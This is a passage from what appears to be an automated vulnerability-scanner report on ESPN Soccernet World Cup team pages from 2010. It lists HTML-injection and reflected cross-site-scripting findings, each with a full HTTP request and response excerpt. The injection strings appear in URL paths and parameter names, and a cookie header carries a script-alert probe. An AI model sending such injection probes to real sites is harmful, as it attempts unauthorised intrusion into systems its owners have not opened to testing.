mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Cache-Expires: Sat, 06 Nov 2010 23:12:01 GMT Content-Length: 82086 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Argentina Football ...[SNIP]... <a href="/worldcup2010/team?team=202&cf5da"><a>9b858241cd5=1&_slug_=argentina&cf5da"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da7b"><a>7d96bab73b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil6da7b"><a>7d96bab73b8 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:02 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:02 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:14:01 GMT Content-Length: 81397 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Brazil Football / S ...[SNIP]... <a href="/worldcup2010/team?team=205&_slug_=brazil6da7b"><a>7d96bab73b8&topId=806003&linktext=Ex-Milan+coach+available"> ...[SNIP]...
2.58. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/205/brazil
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d87"><a>b513fd88d09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil?36d87"><a>b513fd88d09=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:12:42 GMT Content-Length: 81505 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Brazil Football / S ...[SNIP]... <a href="/worldcup2010/team?team=205&36d87"><a>b513fd88d09=1&_slug_=brazil&36d87"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 977b9"><a>d4b442ea0d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile977b9"><a>d4b442ea0d6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:57 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Cache-Expires: Sat, 06 Nov 2010 23:13:57 GMT Content-Length: 81910 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chile Football / So ...[SNIP]... <a href="/worldcup2010/team?team=207&_slug_=chile977b9"><a>d4b442ea0d6&topId=803725&linktext=Brilliant+Brazil+put+three+past+Chile"> ...[SNIP]...
2.60. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/207/chile
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe29"><a>f1fd16cfb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile?ebe29"><a>f1fd16cfb8e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:29 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:29 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sat, 06 Nov 2010 23:12:29 GMT Content-Length: 82018 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chile Football / So ...[SNIP]... <a href="/worldcup2010/team?team=207&ebe29"><a>f1fd16cfb8e=1&_slug_=chile&ebe29"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d453d"><a>904bfdecc42 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguayd453d"><a>904bfdecc42 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:44 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:31:44 GMT Content-Length: 82073 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Paraguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=210&_slug_=paraguayd453d"><a>904bfdecc42&topId=799269&linktext=Gerardo+Martino+to+remain+as+coach"> ...[SNIP]...
2.62. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/210/paraguay
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e861b"><a>1c6180afac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguay?e861b"><a>1c6180afac1=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:22:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:22:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sat, 06 Nov 2010 23:27:55 GMT Content-Length: 82181 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Paraguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=210&e861b"><a>1c6180afac1=1&_slug_=paraguay&e861b"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416ae"><a>174e4000843 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay416ae"><a>174e4000843 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:33 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:34:33 GMT Content-Length: 81983 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Uruguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=212&_slug_=uruguay416ae"><a>174e4000843&topId=807748&linktext=Germany+finish+in+third+place"> ...[SNIP]...
2.64. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/212/uruguay
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f178"><a>aa580cad459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
